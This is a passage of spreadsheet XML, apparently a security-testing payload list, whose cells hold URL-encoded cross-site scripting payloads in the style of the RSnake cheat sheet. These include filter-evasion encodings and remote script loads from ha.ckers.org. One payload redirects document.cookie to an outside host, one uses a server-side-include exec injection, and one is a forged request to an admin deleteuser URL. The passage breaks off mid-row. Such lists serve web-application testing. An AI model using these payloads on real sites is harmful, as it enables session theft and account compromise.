      <c r="B2332" s="4" t="str">
        <f t="shared" si="1"/>
        <v>perl%20-e%20%26%23039%3Bprint%20%5C%26quot%3B%26lt%3BIMG%20SRC%3Djava%5C0script%3Aalert%28%5C%26quot%3BXSS%5C%26quot%3B%29%26gt%3B%5C%26quot%3B%3B%26%23039%3B%20%26gt%3B%20out</v>
      </c>
    </row>
    <row r="2333">
      <c r="A2333" s="3" t="s">
        <v>1354</v>
      </c>
      <c r="B2333" s="4" t="str">
        <f t="shared" si="1"/>
        <v>perl%20-e%20%26%23039%3Bprint%20%5C%26quot%3B%26lt%3BSCR%5C0IPT%26gt%3Balert%28%5C%26quot%3BXSS%5C%26quot%3B%29%26lt%3B%2FSCR%5C0IPT%26gt%3B%5C%26quot%3B%3B%26%23039%3B%20%26gt%3B%20out</v>
      </c>
    </row>
    <row r="2334">
      <c r="A2334" s="3" t="s">
        <v>1355</v>
      </c>
      <c r="B2334" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%7E%2FXSS%2F%2A-%2A%2FSTYLE%3Dxss%3Ae%2F%2A%2A%2Fxpression%28alert%28%27XSS%27%29%29%3E</v>
      </c>
    </row>
    <row r="2335">
      <c r="A2335" s="3" t="s">
        <v>1356</v>
      </c>
      <c r="B2335" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%7E%2FXSS%2F%2A-%2A%2FSTYLE%3Dxss%3Ae%2F%2A%2A%2Fxpression%28window.location%3D%22http%3A%2F%2Fwww.procheckup.com%2F%3Fsid%3D%22%252bdocument.cookie%29%3E</v>
      </c>
    </row>
    <row r="2336">
      <c r="A2336" s="3" t="s">
        <v>1355</v>
      </c>
      <c r="B2336" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%7E%2FXSS%2F%2A-%2A%2FSTYLE%3Dxss%3Ae%2F%2A%2A%2Fxpression%28alert%28%27XSS%27%29%29%3E</v>
      </c>
    </row>
    <row r="2337">
      <c r="A2337" s="3" t="s">
        <v>1357</v>
      </c>
      <c r="B2337" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%7E%2FXSS%20STYLE%3Dxss%3Aexpression%28alert%28%27XSS%27%29%29%3E</v>
      </c>
    </row>
    <row r="2338">
      <c r="A2338" s="3" t="s">
        <v>1358</v>
      </c>
      <c r="B2338" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%3C%2FXSS%2F%2A-%2A%2FSTYLE%3Dxss%3Ae%2F%2A%2A%2Fxpression%28alert%28%27XSS%27%29%29%3EXSS%2F%2A-%2A%2FSTYLE%3Dxss%3Ae%2F%2A%2A%2Fxpression%28alert%28%27XSS%27%29%29%3EXSS%20STYLE%3Dxss%3Ae%2F%2A%2A%2Fxpression%28alert%28%27XSS%27%29%29%3E%3C%2FXSS%20STYLE%3Dxss%3Aexpression%28alert%28%27XSS%27%29%29%3E%27%3B%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3B%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%3B%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3B%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3B%3C%3B%2FSCRIPT%3E%3B%22%3B%3E%3B%27%3B%3E%3B%3C%3BSCRIPT%3E%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%3B%2FSCRIPT%3E%3B</v>
      </c>
    </row>
    <row r="2339">
      <c r="A2339" s="5" t="s">
        <v>1359</v>
      </c>
      <c r="B2339" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3B%27%3B%3B%21--%22%3B%3C%3BXSS%3E%3B%3D%26%3B%7B%28%29%7D</v>
      </c>
    </row>
    <row r="2340">
      <c r="A2340" s="3" t="s">
        <v>1360</v>
      </c>
      <c r="B2340" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BSCRIPT%3E%3Balert%28%27%3BXSS%27%3B%29%3C%3B%2FSCRIPT%3E%3B</v>
      </c>
    </row>
    <row r="2341">
      <c r="A2341" s="3" t="s">
        <v>1361</v>
      </c>
      <c r="B2341" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BSCRIPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3B%3C%3B%2FSCRIPT%3E%3B</v>
      </c>
    </row>
    <row r="2342">
      <c r="A2342" s="3" t="s">
        <v>1362</v>
      </c>
      <c r="B2342" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BSCRIPT%3E%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%3B%2FSCRIPT%3E%3B</v>
      </c>
    </row>
    <row r="2343">
      <c r="A2343" s="3" t="s">
        <v>1363</v>
      </c>
      <c r="B2343" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BBASE%20HREF%3D%22%3Bjavascript%3Aalert%28%27%3BXSS%27%3B%29%3B%2F%2F%22%3B%3E%3B</v>
      </c>
    </row>
    <row r="2344">
      <c r="A2344" s="3" t="s">
        <v>1364</v>
      </c>
      <c r="B2344" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BBGSOUND%20SRC%3D%22%3Bjavascript%3Aalert%28%27%3BXSS%27%3B%29%3B%22%3B%3E%3B</v>
      </c>
    </row>
    <row r="2345">
      <c r="A2345" s="3" t="s">
        <v>1365</v>
      </c>
      <c r="B2345" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BBODY%20BACKGROUND%3D%22%3Bjavascript%3Aalert%28%27%3BXSS%27%3B%29%3B%22%3B%3E%3B</v>
      </c>
    </row>
    <row r="2346">
      <c r="A2346" s="3" t="s">
        <v>1366</v>
      </c>
      <c r="B2346" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BBODY%20ONLOAD%3Dalert%28%27%3BXSS%27%3B%29%3E%3B</v>
      </c>
    </row>
    <row r="2347">
      <c r="A2347" s="3" t="s">
        <v>1367</v>
      </c>
      <c r="B2347" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BDIV%20STYLE%3D%22%3Bbackground-image%3A%20url%28javascript%3Aalert%28%27%3BXSS%27%3B%29%29%22%3B%3E%3B</v>
      </c>
    </row>
    <row r="2348">
      <c r="A2348" s="3" t="s">
        <v>1368</v>
      </c>
      <c r="B2348" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BDIV%20STYLE%3D%22%3Bbackground-image%3A%20url%28%26%3B%231%3Bjavascript%3Aalert%28%27%3BXSS%27%3B%29%29%22%3B%3E%3B</v>
      </c>
    </row>
    <row r="2349">
      <c r="A2349" s="3" t="s">
        <v>1369</v>
      </c>
      <c r="B2349" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BDIV%20STYLE%3D%22%3Bwidth%3A%20expression%28alert%28%27%3BXSS%27%3B%29%29%3B%22%3B%3E%3B</v>
      </c>
    </row>
    <row r="2350">
      <c r="A2350" s="3" t="s">
        <v>1370</v>
      </c>
      <c r="B2350" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BFRAMESET%3E%3B%3C%3BFRAME%20SRC%3D%22%3Bjavascript%3Aalert%28%27%3BXSS%27%3B%29%3B%22%3B%3E%3B%3C%3B%2FFRAMESET%3E%3B</v>
      </c>
    </row>
    <row r="2351">
      <c r="A2351" s="3" t="s">
        <v>1371</v>
      </c>
      <c r="B2351" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BIFRAME%20SRC%3D%22%3Bjavascript%3Aalert%28%27%3BXSS%27%3B%29%3B%22%3B%3E%3B%3C%3B%2FIFRAME%3E%3B</v>
      </c>
    </row>
    <row r="2352">
      <c r="A2352" s="3" t="s">
        <v>1372</v>
      </c>
      <c r="B2352" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BINPUT%20TYPE%3D%22%3BIMAGE%22%3B%20SRC%3D%22%3Bjavascript%3Aalert%28%27%3BXSS%27%3B%29%3B%22%3B%3E%3B</v>
      </c>
    </row>
    <row r="2353">
      <c r="A2353" s="3" t="s">
        <v>1373</v>
      </c>
      <c r="B2353" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BIMG%20SRC%3D%22%3Bjavascript%3Aalert%28%27%3BXSS%27%3B%29%3B%22%3B%3E%3B</v>
      </c>
    </row>
    <row r="2354">
      <c r="A2354" s="3" t="s">
        <v>1374</v>
      </c>
      <c r="B2354" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BIMG%20SRC%3Djavascript%3Aalert%28%27%3BXSS%27%3B%29%3E%3B</v>
      </c>
    </row>
    <row r="2355">
      <c r="A2355" s="3" t="s">
        <v>1375</v>
      </c>
      <c r="B2355" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BIMG%20DYNSRC%3D%22%3Bjavascript%3Aalert%28%27%3BXSS%27%3B%29%3B%22%3B%3E%3B</v>
      </c>
    </row>
    <row r="2356">
      <c r="A2356" s="3" t="s">
        <v>1376</v>
      </c>
      <c r="B2356" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BIMG%20LOWSRC%3D%22%3Bjavascript%3Aalert%28%27%3BXSS%27%3B%29%3B%22%3B%3E%3B</v>
      </c>
    </row>
    <row r="2357">
      <c r="A2357" s="3" t="s">
        <v>1377</v>
      </c>
      <c r="B2357" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BIMG%20SRC%3D%22%3Bhttp%3A%2F%2Fwww.thesiteyouareon.com%2Fsomecommand.php%3Fsomevariables%3Dmaliciouscode%22%3B%3E%3B</v>
      </c>
    </row>
    <row r="2358">
      <c r="A2358" s="3" t="s">
        <v>1378</v>
      </c>
      <c r="B2358" s="4" t="str">
        <f t="shared" si="1"/>
        <v>Redirect%20302%20%2Fa.jpg%20http%3A%2F%2Fvictimsite.com%2Fadmin.asp%26%3Bdeleteuser</v>
      </c>
    </row>
    <row r="2359">
      <c r="A2359" s="3" t="s">
        <v>1379</v>
      </c>
      <c r="B2359" s="4" t="str">
        <f t="shared" si="1"/>
        <v>exp%2F%2A%3C%3BXSS%20STYLE%3D%27%3Bno%5Cxss%3Anoxss%28%22%3B%2A%2F%2F%2A%22%3B%29%3B</v>
      </c>
    </row>
    <row r="2360">
      <c r="A2360" s="3" t="s">
        <v>1380</v>
      </c>
      <c r="B2360" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BSTYLE%3E%3Bli%20%7Blist-style-image%3A%20url%28%22%3Bjavascript%3Aalert%28%26%2339%3BXSS%26%2339%3B%29%22%3B%29%3B%7D%3C%3B%2FSTYLE%3E%3B%3C%3BUL%3E%3B%3C%3BLI%3E%3BXSS</v>
      </c>
    </row>
    <row r="2361">
      <c r="A2361" s="3" t="s">
        <v>1381</v>
      </c>
      <c r="B2361" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BIMG%20SRC%3D%27%3Bvbscript%3Amsgbox%28%22%3BXSS%22%3B%29%27%3B%3E%3B</v>
      </c>
    </row>
    <row r="2362">
      <c r="A2362" s="3" t="s">
        <v>1382</v>
      </c>
      <c r="B2362" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BLAYER%20SRC%3D%22%3Bhttp%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3B%3E%3B%3C%3B%2FLAYER%3E%3B</v>
      </c>
    </row>
    <row r="2363">
      <c r="A2363" s="3" t="s">
        <v>1383</v>
      </c>
      <c r="B2363" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BIMG%20SRC%3D%22%3Blivescript%3A%5Bcode%5D%22%3B%3E%3B</v>
      </c>
    </row>
    <row r="2364">
      <c r="A2364" s="3" t="s">
        <v>1170</v>
      </c>
      <c r="B2364" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%25BCscript%25BEalert%28%25A2XSS%25A2%29%25BC%2Fscript%25BE</v>
      </c>
    </row>
    <row r="2365">
      <c r="A2365" s="3" t="s">
        <v>1384</v>
      </c>
      <c r="B2365" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BMETA%20HTTP-EQUIV%3D%22%3Brefresh%22%3B%20CONTENT%3D%22%3B0%3Burl%3Djavascript%3Aalert%28%27%3BXSS%27%3B%29%3B%22%3B%3E%3B</v>
      </c>
    </row>
    <row r="2366">
      <c r="A2366" s="3" t="s">
        <v>1385</v>
      </c>
      <c r="B2366" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BMETA%20HTTP-EQUIV%3D%22%3Brefresh%22%3B%20CONTENT%3D%22%3B0%3Burl%3Ddata%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%22%3B%3E%3B</v>
      </c>
    </row>
    <row r="2367">
      <c r="A2367" s="3" t="s">
        <v>1386</v>
      </c>
      <c r="B2367" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BMETA%20HTTP-EQUIV%3D%22%3Brefresh%22%3B%20CONTENT%3D%22%3B0%3B%20URL%3Dhttp%3A%2F%2F%3BURL%3Djavascript%3Aalert%28%27%3BXSS%27%3B%29%3B%22%3B%3E%3B</v>
      </c>
    </row>
    <row r="2368">
      <c r="A2368" s="3" t="s">
        <v>1387</v>
      </c>
      <c r="B2368" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BIMG%20SRC%3D%22%3Bmocha%3A%5Bcode%5D%22%3B%3E%3B</v>
      </c>
    </row>
    <row r="2369">
      <c r="A2369" s="3" t="s">
        <v>1388</v>
      </c>
      <c r="B2369" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BOBJECT%20TYPE%3D%22%3Btext%2Fx-scriptlet%22%3B%20DATA%3D%22%3Bhttp%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3B%3E%3B%3C%3B%2FOBJECT%3E%3B</v>
      </c>
    </row>
    <row r="2370">
      <c r="A2370" s="3" t="s">
        <v>1389</v>
      </c>
      <c r="B2370" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BOBJECT%20classid%3Dclsid%3Aae24fdae-03c6-11d1-8b76-0080c744f389%3E%3B%3C%3Bparam%20name%3Durl%20value%3Djavascript%3Aalert%28%27%3BXSS%27%3B%29%3E%3B%3C%3B%2FOBJECT%3E%3B</v>
      </c>
    </row>
    <row r="2371">
      <c r="A2371" s="3" t="s">
        <v>1390</v>
      </c>
      <c r="B2371" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BEMBED%20SRC%3D%22%3Bhttp%3A%2F%2Fha.ckers.org%2Fxss.swf%22%3B%20AllowScriptAccess%3D%22%3Balways%22%3B%3E%3B%3C%3B%2FEMBED%3E%3B</v>
      </c>
    </row>
    <row r="2372">
      <c r="A2372" s="3" t="s">
        <v>1391</v>
      </c>
      <c r="B2372" s="4" t="str">
        <f t="shared" si="1"/>
        <v>a%3D%22%3Bget%22%3B%3B%26%3B%2310%3Bb%3D%22%3BURL%28%22%3B%22%3B%3B%26%3B%2310%3Bc%3D%22%3Bjavascript%3A%22%3B%3B%26%3B%2310%3Bd%3D%22%3Balert%28%27%3BXSS%27%3B%29%3B%22%3B%29%22%3B%3B%26%2310%3Beval%28a%2Bb%2Bc%2Bd%29%3B</v>
      </c>
    </row>
    <row r="2373">
      <c r="A2373" s="3" t="s">
        <v>1392</v>
      </c>
      <c r="B2373" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BSTYLE%20TYPE%3D%22%3Btext%2Fjavascript%22%3B%3E%3Balert%28%27%3BXSS%27%3B%29%3B%3C%3B%2FSTYLE%3E%3B</v>
      </c>
    </row>
    <row r="2374">
      <c r="A2374" s="3" t="s">
        <v>1393</v>
      </c>
      <c r="B2374" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BIMG%20STYLE%3D%22%3Bxss%3Aexpr%2F%2AXSS%2A%2Fession%28alert%28%27%3BXSS%27%3B%29%29%22%3B%3E%3B</v>
      </c>
    </row>
    <row r="2375">
      <c r="A2375" s="3" t="s">
        <v>1394</v>
      </c>
      <c r="B2375" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BXSS%20STYLE%3D%22%3Bxss%3Aexpression%28alert%28%27%3BXSS%27%3B%29%29%22%3B%3E%3B</v>
      </c>
    </row>
    <row r="2376">
      <c r="A2376" s="3" t="s">
        <v>1395</v>
      </c>
      <c r="B2376" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BSTYLE%3E%3B.XSS%7Bbackground-image%3Aurl%28%22%3Bjavascript%3Aalert%28%27%3BXSS%27%3B%29%22%3B%29%3B%7D%3C%3B%2FSTYLE%3E%3B%3C%3BA%20CLASS%3DXSS%3E%3B%3C%3B%2FA%3E%3B</v>
      </c>
    </row>
    <row r="2377">
      <c r="A2377" s="3" t="s">
        <v>1396</v>
      </c>
      <c r="B2377" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BSTYLE%20type%3D%22%3Btext%2Fcss%22%3B%3E%3BBODY%7Bbackground%3Aurl%28%22%3Bjavascript%3Aalert%28%27%3BXSS%27%3B%29%22%3B%29%7D%3C%3B%2FSTYLE%3E%3B</v>
      </c>
    </row>
    <row r="2378">
      <c r="A2378" s="3" t="s">
        <v>1397</v>
      </c>
      <c r="B2378" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BLINK%20REL%3D%22%3Bstylesheet%22%3B%20HREF%3D%22%3Bjavascript%3Aalert%28%27%3BXSS%27%3B%29%3B%22%3B%3E%3B</v>
      </c>
    </row>
    <row r="2379">
      <c r="A2379" s="3" t="s">
        <v>1398</v>
      </c>
      <c r="B2379" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BLINK%20REL%3D%22%3Bstylesheet%22%3B%20HREF%3D%22%3Bhttp%3A%2F%2Fha.ckers.org%2Fxss.css%22%3B%3E%3B</v>
      </c>
    </row>
    <row r="2380">
      <c r="A2380" s="3" t="s">
        <v>1399</v>
      </c>
      <c r="B2380" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BSTYLE%3E%3B%40import%27%3Bhttp%3A%2F%2Fha.ckers.org%2Fxss.css%27%3B%3B%3C%3B%2FSTYLE%3E%3B</v>
      </c>
    </row>
    <row r="2381">
      <c r="A2381" s="3" t="s">
        <v>1400</v>
      </c>
      <c r="B2381" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BMETA%20HTTP-EQUIV%3D%22%3BLink%22%3B%20Content%3D%22%3B%3C%3Bhttp%3A%2F%2Fha.ckers.org%2Fxss.css%3E%3B%3B%20REL%3Dstylesheet%22%3B%3E%3B</v>
      </c>
    </row>
    <row r="2382">
      <c r="A2382" s="3" t="s">
        <v>1401</v>
      </c>
      <c r="B2382" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BSTYLE%3E%3BBODY%7B-moz-binding%3Aurl%28%22%3Bhttp%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%22%3B%29%7D%3C%3B%2FSTYLE%3E%3B</v>
      </c>
    </row>
    <row r="2383">
      <c r="A2383" s="3" t="s">
        <v>1402</v>
      </c>
      <c r="B2383" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BTABLE%20BACKGROUND%3D%22%3Bjavascript%3Aalert%28%27%3BXSS%27%3B%29%22%3B%3E%3B%3C%3B%2FTABLE%3E%3B</v>
      </c>
    </row>
    <row r="2384">
      <c r="A2384" s="3" t="s">
        <v>1403</v>
      </c>
      <c r="B2384" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BTABLE%3E%3B%3C%3BTD%20BACKGROUND%3D%22%3Bjavascript%3Aalert%28%27%3BXSS%27%3B%29%22%3B%3E%3B%3C%3B%2FTD%3E%3B%3C%3B%2FTABLE%3E%3B</v>
      </c>
    </row>
    <row r="2385">
      <c r="A2385" s="3" t="s">
        <v>1404</v>
      </c>
      <c r="B2385" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BHTML%20xmlns%3Axss%3E%3B</v>
      </c>
    </row>
    <row r="2386">
      <c r="A2386" s="3" t="s">
        <v>1405</v>
      </c>
      <c r="B2386" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BXML%20ID%3DI%3E%3B%3C%3BX%3E%3B%3C%3BC%3E%3B%3C%3B%21%5BCDATA%5B%3C%3BIMG%20SRC%3D%22%3Bjavas%5D%5D%3E%3B%3C%3B%21%5BCDATA%5Bcript%3Aalert%28%27%3BXSS%27%3B%29%3B%22%3B%3E%3B%5D%5D%3E%3B</v>
      </c>
    </row>
    <row r="2387">
      <c r="A2387" s="3" t="s">
        <v>1406</v>
      </c>
      <c r="B2387" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BXML%20ID%3D%22%3Bxss%22%3B%3E%3B%3C%3BI%3E%3B%3C%3BB%3E%3B%3C%3BIMG%20SRC%3D%22%3Bjavas%3C%3B%21--%20--%3E%3Bcript%3Aalert%28%27%3BXSS%27%3B%29%22%3B%3E%3B%3C%3B%2FB%3E%3B%3C%3B%2FI%3E%3B%3C%3B%2FXML%3E%3B</v>
      </c>
    </row>
    <row r="2388">
      <c r="A2388" s="3" t="s">
        <v>1407</v>
      </c>
      <c r="B2388" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BXML%20SRC%3D%22%3Bhttp%3A%2F%2Fha.ckers.org%2Fxsstest.xml%22%3B%20ID%3DI%3E%3B%3C%3B%2FXML%3E%3B</v>
      </c>
    </row>
    <row r="2389">
      <c r="A2389" s="3" t="s">
        <v>1408</v>
      </c>
      <c r="B2389" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BHTML%3E%3B%3C%3BBODY%3E%3B</v>
      </c>
    </row>
    <row r="2390">
      <c r="A2390" s="3" t="s">
        <v>1409</v>
      </c>
      <c r="B2390" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3B%21--%5Bif%20gte%20IE%204%5D%3E%3B</v>
      </c>
    </row>
    <row r="2391">
      <c r="A2391" s="3" t="s">
        <v>1410</v>
      </c>
      <c r="B2391" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BMETA%20HTTP-EQUIV%3D%22%3BSet-Cookie%22%3B%20Content%3D%22%3BUSERID%3D%3C%3BSCRIPT%3E%3Balert%28%27%3BXSS%27%3B%29%3C%3B%2FSCRIPT%3E%3B%22%3B%3E%3B</v>
      </c>
    </row>
    <row r="2392">
      <c r="A2392" s="3" t="s">
        <v>1411</v>
      </c>
      <c r="B2392" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BXSS%20STYLE%3D%22%3Bbehavior%3A%20url%28http%3A%2F%2Fha.ckers.org%2Fxss.htc%29%3B%22%3B%3E%3B</v>
      </c>
    </row>
    <row r="2393">
      <c r="A2393" s="3" t="s">
        <v>1412</v>
      </c>
      <c r="B2393" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BSCRIPT%20SRC%3D%22%3Bhttp%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3B%3E%3B%3C%3B%2FSCRIPT%3E%3B</v>
      </c>
    </row>
    <row r="2394">
      <c r="A2394" s="3" t="s">
        <v>1413</v>
      </c>
      <c r="B2394" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3B%21--%23exec%20cmd%3D%22%3B%2Fbin%2Fecho%20%27%3B%3C%3BSCRIPT%20SRC%27%3B%22%3B--%3E%3B%3C%3B%21--%23exec%20cmd%3D%22%3B%2Fbin%2Fecho%20%27%3B%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3B%3C%3B%2FSCRIPT%3E%3B%27%3B%22%3B--%3E%3B</v>
      </c>
    </row>
    <row r="2395">
      <c r="A2395" s="3" t="s">
        <v>1414</v>
      </c>
      <c r="B2395" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3B%3F%20echo%28%27%3B%3C%3BSCR%29%27%3B%3B</v>
      </c>
    </row>
    <row r="2396">
      <c r="A2396" s="3" t="s">
        <v>1415</v>
      </c>
      <c r="B2396" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BBR%20SIZE%3D%22%3B%26%3B%7Balert%28%27%3BXSS%27%3B%29%7D%22%3B%3E%3B</v>
      </c>
    </row>
    <row r="2397">
      <c r="A2397" s="3" t="s">
        <v>1416</v>
      </c>
      <c r="B2397" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BIMG%20SRC%3DJaVaScRiPt%3Aalert%28%27%3BXSS%27%3B%29%3E%3B</v>
      </c>
    </row>
    <row r="2398">
      <c r="A2398" s="3" t="s">
        <v>1417</v>
      </c>
      <c r="B2398" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BIMG%20SRC%3Djavascript%3Aalert%28%26%3Bquot%3BXSS%26%3Bquot%3B%29%3E%3B</v>
      </c>
    </row>
    <row r="2399">
      <c r="A2399" s="3" t="s">
        <v>1418</v>
      </c>
      <c r="B2399" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BIMG%20SRC%3D%60javascript%3Aalert%28%22%3BRSnake%20says%2C%20%27%3BXSS%27%3B%22%3B%29%60%3E%3B</v>
      </c>
    </row>
    <row r="2400">
      <c r="A2400" s="3" t="s">
        <v>1419</v>
      </c>
      <c r="B2400" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BIMG%20SRC%3Djavascript%3Aalert%28String.fromCharCode%2888%2C83%2C83%29%29%3E%3B</v>
      </c>
    </row>
    <row r="2401">
      <c r="A2401" s="3" t="s">
        <v>1420</v>
      </c>
      <c r="B2401" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BIMG%20RC%3D%26%3B%23106%3B%26%3B%2397%3B%26%3B%23118%3B%26%3B%2397%3B%26%3B%23115%3B%26%3B%2399%3B%26%3B%23114%3B%26%3B%23105%3B%26%3B%23112%3B%26%3B%23116%3B%26%3B%2358%3B%26%3B%2397%3B%26%3B%23108%3B%26%3B%23101%3B%26%3B%23114%3B%26%3B%23116%3B%26%3B%2340%3B%26%3B%2339%3B%26%3B%2388%3B%26%3B%2383%3B%26%3B%2383%3B%26%3B%2339%3B%26%3B%2341%3B%3E%3B</v>
      </c>
    </row>
    <row r="2402">
      <c r="A2402" s="3" t="s">
        <v>1421</v>
      </c>
      <c r="B2402" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BIMG%20RC%3D%26%3B%230000106%26%3B%230000097%26%3B%230000118%26%3B%230000097%26%3B%230000115%26%3B%230000099%26%3B%230000114%26%3B%230000105%26%3B%230000112%26%3B%230000116%26%3B%230000058%26%3B%230000097%26%3B%230000108%26%3B%230000101%26%3B%230000114%26%3B%230000116%26%3B%230000040%26%3B%230000039%26%3B%230000088%26%3B%230000083%26%3B%230000083%26%3B%230000039%26%3B%230000041%3E%3B</v>
      </c>
    </row>
    <row r="2403">
      <c r="A2403" s="3" t="s">
        <v>1422</v>
      </c>
      <c r="B2403" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BDIV%20STYLE%3D%22%3Bbackground-image%3A%5C0075%5C0072%5C006C%5C0028%27%3B%5C006a%5C0061%5C0076%5C0061%5C0073%5C0063%5C0072%5C0069%5C0070%5C0074%5C003a%5C0061%5C006c%5C0065%5C0072%5C0074%5C0028.1027%5C0058.10530053%5C0027%5C0029%27%3B%5C0029%22%3B%3E%3B</v>
      </c>
    </row>
    <row r="2404">
      <c r="A2404" s="3" t="s">
        <v>1423</v>
      </c>
      <c r="B2404" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BIMG%20SRC%3D%26%3B%23x6A%26%3B%23x61%26%3B%23x76%26%3B%23x61%26%3B%23x73%26%3B%23x63%26%3B%23x72%26%3B%23x69%26%3B%23x70%26%3B%23x74%26%3B%23x3A%26%3B%23x61%26%3B%23x6C%26%3B%23x65%26%3B%23x72%26%3B%23x74%26%3B%23x28%26%3B%23x27%26%3B%23x58%26%3B%23x53%26%3B%23x53%26%3B%23x27%26%3B%23x29%3E%3B</v>
      </c>
    </row>
    <row r="2405">
      <c r="A2405" s="3" t="s">
        <v>1424</v>
      </c>
      <c r="B2405" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BHEAD%3E%3B%3C%3BMETA%20HTTP-EQUIV%3D%22%3BCONTENT-TYPE%22%3B%20CONTENT%3D%22%3Btext%2Fhtml%3B%20charset%3DUTF-7%22%3B%3E%3B%20%3C%3B%2FHEAD%3E%3B%2BADw-SCRIPT%2BAD4-alert%28%27%3BXSS%27%3B%29%3B%2BADw-%2FSCRIPT%2BAD4-</v>
      </c>
    </row>
    <row r="2406">
      <c r="A2406" s="3" t="s">
        <v>1425</v>
      </c>
      <c r="B2406" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%5C%22%3B%3Balert%28%27%3BXSS%27%3B%29%3B%2F%2F</v>
      </c>
    </row>
    <row r="2407">
      <c r="A2407" s="3" t="s">
        <v>1426</v>
      </c>
      <c r="B2407" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3B%2FTITLE%3E%3B%3C%3BSCRIPT%3E%3Balert%28%22XSS%22%29%3B%3C%3B%2FSCRIPT%3E%3B</v>
      </c>
    </row>
    <row r="2408">
      <c r="A2408" s="3" t="s">
        <v>1427</v>
      </c>
      <c r="B2408" s="4" t="str">
        <f t="shared" si="1"/>
